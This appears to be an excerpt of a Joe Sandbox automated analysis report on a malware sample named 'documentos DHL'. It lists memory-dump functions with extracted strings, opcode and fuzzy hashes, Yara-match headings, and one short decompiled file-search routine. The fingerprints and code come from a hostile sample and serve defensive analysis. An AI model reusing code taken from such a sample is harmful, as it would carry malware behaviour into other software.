Function 03391419 Relevance: 3.2, Strings: 2, Instructions: 700COMMON

Download Yara Rule

Strings

vm_3, xrefs: 0339141F
Me2, xrefs: 03391DDC

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: Me2$vm_3
API String ID: 0-1112126556
Opcode ID: c2904473ab372a8b296d0ba282e5e3990807966a226915cbfbeecadc43335c71
Instruction ID: d0e24c4e05545ee273117a608e5c6829dc8eed5c18f66d9d6120ac72b687a91d
Opcode Fuzzy Hash: c2904473ab372a8b296d0ba282e5e3990807966a226915cbfbeecadc43335c71
Instruction Fuzzy Hash: F35239319083868FEF35DF38C9D87DA7BA29F52360F59829ACC998F296D3348545C712

Uniqueness

Uniqueness Score: -1.00%

Function 033776B4 Relevance: 2.9, Strings: 2, Instructions: 397COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 6ac56da431a3ee95b82e9a1ffd622637080b10c75b4263c114e4712e8b1d1057
Instruction ID: 1e7c9b0bd105420b702fe4ba08edd73d172913f96d7c1423f7e3167596e36ac5
Opcode Fuzzy Hash: 6ac56da431a3ee95b82e9a1ffd622637080b10c75b4263c114e4712e8b1d1057
Instruction Fuzzy Hash: FDE102B1508789CFCB31DF6C8CA93EA7BA6EF19350F84412ECC898B616C3795586CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0338E704 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

jl, xrefs: 0338E85A
jl, xrefs: 0338E855

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: jl$jl
API String ID: 0-3709607906
Opcode ID: aeb2b930102962d62fb85692bed799cd043f1bdb643a7c9370a141990924d239
Instruction ID: 14aeb879e005798f20546992235553f369895c78a69f2ba7ed673b59bc983ee4
Opcode Fuzzy Hash: aeb2b930102962d62fb85692bed799cd043f1bdb643a7c9370a141990924d239
Instruction Fuzzy Hash: D5A143B1514348CFDB3ACF74C9963DA3BB0EF46790F5A049ACC869B661E7344942CB12

Uniqueness

Uniqueness Score: -1.00%

Function 03377468 Relevance: 2.7, Strings: 2, Instructions: 222COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 90703c0631d152eab913a9c8030ff7fdb4904f1e8f17c3c680c2462449312757
Instruction ID: ea8a754d75fa4c424304ed00327d984a2a26ed00b0230e4cf98008d839303712
Opcode Fuzzy Hash: 90703c0631d152eab913a9c8030ff7fdb4904f1e8f17c3c680c2462449312757
Instruction Fuzzy Hash: A691F675608789CFCB31DF798C993EA3BB6EF55350F84812ECC998B616C37906868B11

Uniqueness

Uniqueness Score: -1.00%

Function 033775B7 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 7f8ce0e3e15845ac32e8b9111008ddd349bcc8ec04335e4f53549a70d5ed4853
Instruction ID: 4bf4b5ec473be51dabe75bd17c86c266d2bb8a802527151ec0831978ac39f803
Opcode Fuzzy Hash: 7f8ce0e3e15845ac32e8b9111008ddd349bcc8ec04335e4f53549a70d5ed4853
Instruction Fuzzy Hash: 7C911671108789CBCB31DF798CA93EA3BB6EF15350F84812ECC998B616C3791686CB11

Uniqueness

Uniqueness Score: -1.00%

Function 03377569 Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 9b506882b129dc745b7459994269ab44c54d0d2de8cda1219869d12f1be8e31d
Instruction ID: d57cb1a58f5f2379b499ceae7f7fc726141d00a98b1c3f00ce241cda57ab9820
Opcode Fuzzy Hash: 9b506882b129dc745b7459994269ab44c54d0d2de8cda1219869d12f1be8e31d
Instruction Fuzzy Hash: 28911771508789CBCB31DF798CA93EA3BB6EF55350F84812ECC998B616C3350686CB11

Uniqueness

Uniqueness Score: -1.00%

Function 03377258 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 0af6a63b91410ac2875ade993e2732f17e7d3ff33aca8103e57b1c3c7e928768
Instruction ID: 1851e54a4adc81dabf8c63ed44ff61ae7a8f30cae8897fd2946696caaea5783b
Opcode Fuzzy Hash: 0af6a63b91410ac2875ade993e2732f17e7d3ff33aca8103e57b1c3c7e928768
Instruction Fuzzy Hash: 0C910671608789CBCB71DF7D8CA93EA37B6EF55350F84812ECC998B616C37506868B11

Uniqueness

Uniqueness Score: -1.00%

Function 03377373 Relevance: 2.7, Strings: 2, Instructions: 211COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 18bdb15f194bff0479dd7c85d7a1db585c8af76689098ab320aebac8fe4272df
Instruction ID: ee7e410314c48d8fca681abfa9b95fab6c16fc15deede730c632431a84ace543
Opcode Fuzzy Hash: 18bdb15f194bff0479dd7c85d7a1db585c8af76689098ab320aebac8fe4272df
Instruction Fuzzy Hash: EC811775108789CBCB31DF798CA93EA3BB6EF55350F84812ECC998B616C3791686CB11

Uniqueness

Uniqueness Score: -1.00%

Function 03377578 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

[, xrefs: 03377242
0`\, xrefs: 03377229

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: 0`\$[
API String ID: 0-2832767952
Opcode ID: 1ffb8749b80d8243a787136e457aa7c7908b4593141346e92a429c35ea8d3ff3
Instruction ID: e969c9c5ce7d3ea8ce90ab0981b60f20c2e7ba64e823e6a5104661a742916a03
Opcode Fuzzy Hash: 1ffb8749b80d8243a787136e457aa7c7908b4593141346e92a429c35ea8d3ff3
Instruction Fuzzy Hash: 2471C17460874ACBDF34CF298DA93EA37B6EF55350F84822ADC9D8B255D3350A468B12

Uniqueness

Uniqueness Score: -1.00%

Function 0339085F Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

H^p, xrefs: 03390A9D

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: H^p
API String ID: 0-569105640
Opcode ID: c750f1ab661556def663c13382d2b427c82e789103a4c704567412955a997c6e
Instruction ID: b08172624d1eaf3d262717249dce42e4d2c05fa230cce123b48451614a2f5c2e
Opcode Fuzzy Hash: c750f1ab661556def663c13382d2b427c82e789103a4c704567412955a997c6e
Instruction Fuzzy Hash: 34E194B2904798CFDB75CE38C9D47DA7BE6EF5A340F58412ACC898BA01D7309A85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0339260A Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

n")O, xrefs: 03392A86

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: n")O
API String ID: 0-1666256456
Opcode ID: 0773aae4749bfe2729ded50f6a8135b6ae3bdb4205a53ce249123ae6a7ae44d3
Instruction ID: 72f7c7157ebf58953242e6eb26f2399e339de1088bd57341950766e752141f7d
Opcode Fuzzy Hash: 0773aae4749bfe2729ded50f6a8135b6ae3bdb4205a53ce249123ae6a7ae44d3
Instruction Fuzzy Hash: B4A1676213CD6C6FF21CDB389CCAABB239BF7C6620795C41FE047C759AE46558830165

Uniqueness

Uniqueness Score: -1.00%

Function 03377994 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

z,N, xrefs: 03377A9A

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: z,N
API String ID: 0-2673547552
Opcode ID: a356625a069163573776111e4f5e348ecef4280aa5225b6e8342c322b7d3a3ab
Instruction ID: c0cb306920858c407235760dfa0281a2452bdb54d3ed080472404fcddf312d2c
Opcode Fuzzy Hash: a356625a069163573776111e4f5e348ecef4280aa5225b6e8342c322b7d3a3ab
Instruction Fuzzy Hash: C7C168B2A043489FDB34DE68CD907EA7BE6EF8A3A0F15052DDC89DB600D7344946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 03378AF6 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

!B, xrefs: 03378D53

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: !B
API String ID: 0-3646443039
Opcode ID: 1a0c1361b04f2d4367c2c5eadfd07a47502dfa2df0e90311cce969bf1a860f90
Instruction ID: 72c9baf12a1e57dc9f6db5bd6189f5803475ccc4b515e287612ee48fff8d43c3
Opcode Fuzzy Hash: 1a0c1361b04f2d4367c2c5eadfd07a47502dfa2df0e90311cce969bf1a860f90
Instruction Fuzzy Hash: 46B1897660434ADFDB34DE39CDA87EA77E6EF95350F94812DDC8A9B244D7304A828B01

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004062F7( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E004063B0();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
Opcode Fuzzy Hash: d93f1720afb55d10142a5d85e05fc16c00c53f1b0b53f4af4ae9949186ca55c3
Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A

Uniqueness

Uniqueness Score: -1.00%

Function 03378B2A Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

!B, xrefs: 03378D53

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: !B
API String ID: 0-3646443039
Opcode ID: fea7c027c409b0d1cb316ce7da927167bc81ecef080f33e8d3346036d4309e02
Instruction ID: 0dd7ed64201888da3382dabddae95279bca162e88f0e1976161a3933fe8c572d
Opcode Fuzzy Hash: fea7c027c409b0d1cb316ce7da927167bc81ecef080f33e8d3346036d4309e02
Instruction Fuzzy Hash: D7A13676504389DFDB30EE29CDA87EA77E6FFA4350F85852ECC8997605D7344A828B01

Uniqueness

Uniqueness Score: -1.00%

Function 0337B4B7 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

TxAH, xrefs: 0337B8ED

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: TxAH
API String ID: 0-2930559463
Opcode ID: 5cec70333ac7d05931143025a3a192efb2d985b457a876442d52507ad4a76b81
Instruction ID: 1e034fdb2d8741a376bf4ddf1862a06465bfde68e10ac5ad89334be58082754a
Opcode Fuzzy Hash: 5cec70333ac7d05931143025a3a192efb2d985b457a876442d52507ad4a76b81
Instruction Fuzzy Hash: 35B1EA7120438A8FCB30CF29C9883DA7BB5FF65354F59816ACC5A9F615D3358A42CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0337B56F Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

TxAH, xrefs: 0337B8ED

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: TxAH
API String ID: 0-2930559463
Opcode ID: 9ca4a3c3e5537e006d7803cc1c72edc2ee57becbc4bb09d84a046396eee76403
Instruction ID: 0fffab9972f6938c0c76653659dcde64a496608d9fdfc3bc3fe62b8a3863359c
Opcode Fuzzy Hash: 9ca4a3c3e5537e006d7803cc1c72edc2ee57becbc4bb09d84a046396eee76403
Instruction Fuzzy Hash: 2EA1EB7160438A8FCB30CF29C9883DA77B6FF66364F58816ACC5A9B615D3354A42CF52

Uniqueness

Uniqueness Score: -1.00%

Function 03378C2C Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

!B, xrefs: 03378D53

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: !B
API String ID: 0-3646443039
Opcode ID: bb21815a4f1b48320c87e9f64ec43fcee805c631f624f6c8dde39b2ee464b198
Instruction ID: 2b6baa1a612519d93552f9af6617342e997118bfa6c0f650159091db8203cd8d
Opcode Fuzzy Hash: bb21815a4f1b48320c87e9f64ec43fcee805c631f624f6c8dde39b2ee464b198
Instruction Fuzzy Hash: 588145B6504789CBCB31DE298CA87EA77E6FF99340F94862ECC8987715C73455828B01

Uniqueness

Uniqueness Score: -1.00%

Function 03378DA9 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

!B, xrefs: 03378D53

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: !B
API String ID: 0-3646443039
Opcode ID: 74de7bb24e68ceb97d4b6cd346b6945f7770c0c2a75dadb0628909600f749c66
Instruction ID: 58c7b28ebc38a4e17e42d93f1e64218ff1687c3e26068c712baa6f5076d50097
Opcode Fuzzy Hash: 74de7bb24e68ceb97d4b6cd346b6945f7770c0c2a75dadb0628909600f749c66
Instruction Fuzzy Hash: 3A718C75604789DFCB35DE398CA87EA7BA7BFA9350F94812ECC898B711D33449428701

Uniqueness

Uniqueness Score: -1.00%

Function 033779FF Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

z,N, xrefs: 03377A9A

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: z,N
API String ID: 0-2673547552
Opcode ID: f97769c31cfd6accc04c13ecd786e430b1ae1d11a5c6a1aee81b0afeeb5a2a5b
Instruction ID: 0cec0d457067392f2871edf83bc1ff752403b7b675bd1389885a258b5ea48b3d
Opcode Fuzzy Hash: f97769c31cfd6accc04c13ecd786e430b1ae1d11a5c6a1aee81b0afeeb5a2a5b
Instruction Fuzzy Hash: 1A8165B2A04388CFDB319F688C947EA7BEABF59360F55052EDC89DB701D37449858B81

Uniqueness

Uniqueness Score: -1.00%

Function 0337B57F Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

TxAH, xrefs: 0337B8ED

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: TxAH
API String ID: 0-2930559463
Opcode ID: 3bee4a308ef61ee9f948e8d0d1c70aa31862bbe9563392a077f78e5dc3eb2ce0
Instruction ID: 1a117139e8ccefc24a2c8b8ca1e15921f5ca3c022f377449c83695ba39175a8d
Opcode Fuzzy Hash: 3bee4a308ef61ee9f948e8d0d1c70aa31862bbe9563392a077f78e5dc3eb2ce0
Instruction Fuzzy Hash: C491FC7150439ACFCB30CF29C9883CA7BB5FF6A354F58816ACC9A8B615D3354A46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0337B70E Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

TxAH, xrefs: 0337B8ED

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: TxAH
API String ID: 0-2930559463
Opcode ID: eea3e6e1b01a44ebf1838634455cc618b2e83739f6b76220f22d7b3f8405b678
Instruction ID: d8ce100637b160a0fbbfe6c5695e5d3b82bce0071fa7f115615faf4e2e8d6fd8
Opcode Fuzzy Hash: eea3e6e1b01a44ebf1838634455cc618b2e83739f6b76220f22d7b3f8405b678
Instruction Fuzzy Hash: C87133B1108799CFCB728F388A943C63BB5FF29344F54817ECC968AA16C775064ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0337C007 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

+\Wa, xrefs: 0337C143

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +\Wa
API String ID: 0-4238260906
Opcode ID: d0b01db676255245fb5075c6ca83b494075db03d087b9d75036df604c520c0da
Instruction ID: c6dc99ff13572e13c8a642285884f4640f2a87f7fbc4cfc4e21cbe2904816904
Opcode Fuzzy Hash: d0b01db676255245fb5075c6ca83b494075db03d087b9d75036df604c520c0da
Instruction Fuzzy Hash: DA61F072500784DFEB31CF69C9D83DAB7E6BF49600F59451ACC8A8B611C33DAA42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0337C07E Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

+\Wa, xrefs: 0337C143

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +\Wa
API String ID: 0-4238260906
Opcode ID: 8ffc9dda0bec28245bb920d723125c9aa2b6e7ddb7992ba774c1a100a3826bb8
Instruction ID: a5086a6ad9c362bd6b4be575c9898b67ead728607323d0b8e8f97f730ff4e215
Opcode Fuzzy Hash: 8ffc9dda0bec28245bb920d723125c9aa2b6e7ddb7992ba774c1a100a3826bb8
Instruction Fuzzy Hash: 6051D471600745DBEB34CE56CAE93DFB3E3BF99640F59822ACD4A4B704C3396A418B60

Uniqueness

Uniqueness Score: -1.00%

Function 0337BD8C Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

`W', xrefs: 0337BEE0

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: `W'
API String ID: 0-3419779968
Opcode ID: 7a0c87ce49a17fa078090862209648b870ee1af02aba76233eff6434390d3830
Instruction ID: e48efd8ae48ffc65abf34f8064495fab062c58e3018143e78d3a5ff0b8dff357
Opcode Fuzzy Hash: 7a0c87ce49a17fa078090862209648b870ee1af02aba76233eff6434390d3830
Instruction Fuzzy Hash: A151EF71004784CFDB76DF68C9992D6BBB5FF16650F58819ECC468FA2AC3399481CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0337B847 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

TxAH, xrefs: 0337B8ED

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: TxAH
API String ID: 0-2930559463
Opcode ID: 31d6c81448adc988fee26373cea3b977192031272d4687aaaab7188927593f6f
Instruction ID: 6e1719c4045e0804af9f810a28a1fee9817e7c63b81d56406d644d31ced032a4
Opcode Fuzzy Hash: 31d6c81448adc988fee26373cea3b977192031272d4687aaaab7188927593f6f
Instruction Fuzzy Hash: E85134B2008B99CFC7729F38CA943C27BB9FF25350F54416ECC928AA16C779164ADB45

Uniqueness

Uniqueness Score: -1.00%

Function 0337BD78 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

`W', xrefs: 0337BEE0

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: `W'
API String ID: 0-3419779968
Opcode ID: a6b53c7996b52bf30f4d7add6c7246631ff72f4db13c38971a093f2163032091
Instruction ID: 7342484956c2a97c9093a32e000f53a775783fb15da504ffc4361b94fb5ab25a
Opcode Fuzzy Hash: a6b53c7996b52bf30f4d7add6c7246631ff72f4db13c38971a093f2163032091
Instruction Fuzzy Hash: C94189701003448FEB78DF65C9C5796B7B6EF15660F59C19A8C4A9F62AD3389882CF11

Uniqueness

Uniqueness Score: -1.00%

Function 03377ED8 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab80df3f14c0f5746ed8eefa9b3acc988a5ea7127a5203a26f36a48ec33e276
Instruction ID: 5a0e2d4bc38707def0f05c0503db9fbf4967ac45b0d5b93a260cff6332445df1
Opcode Fuzzy Hash: 0ab80df3f14c0f5746ed8eefa9b3acc988a5ea7127a5203a26f36a48ec33e276
Instruction Fuzzy Hash: 239178B6A003499FDF30EF68CD857EA37A6AF86350F56416DEC89DB240D7348A428B51

Uniqueness

Uniqueness Score: -1.00%

Function 03377691 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f136ce2c2d8271fb009c575cc29e0163c256a4472648f60d7052485dc8b9fc4
Instruction ID: 6f20b897974c9aa0a0f77b0bf8ed80a5a6997acc6b938e9fd5e56d73efccd1f8
Opcode Fuzzy Hash: 4f136ce2c2d8271fb009c575cc29e0163c256a4472648f60d7052485dc8b9fc4
Instruction Fuzzy Hash: CF7156B6A04308DFCB38DF24C9D57EA7BE2AF99790F54452EDC898B611D3354985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 03377B14 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b140febacd158aff0e3e141b3cb68fdab1140cee568d859fac8344df2c671166
Instruction ID: defd36db6f94ddfcf6f82742bc3f8535dceb7cdb77180c807e892589aa7b3669
Opcode Fuzzy Hash: b140febacd158aff0e3e141b3cb68fdab1140cee568d859fac8344df2c671166
Instruction Fuzzy Hash: 496166B2904388CFDB31AF688D507EA7BEAEF193A0F55052EDC899B700D33449818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0338FB9A Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
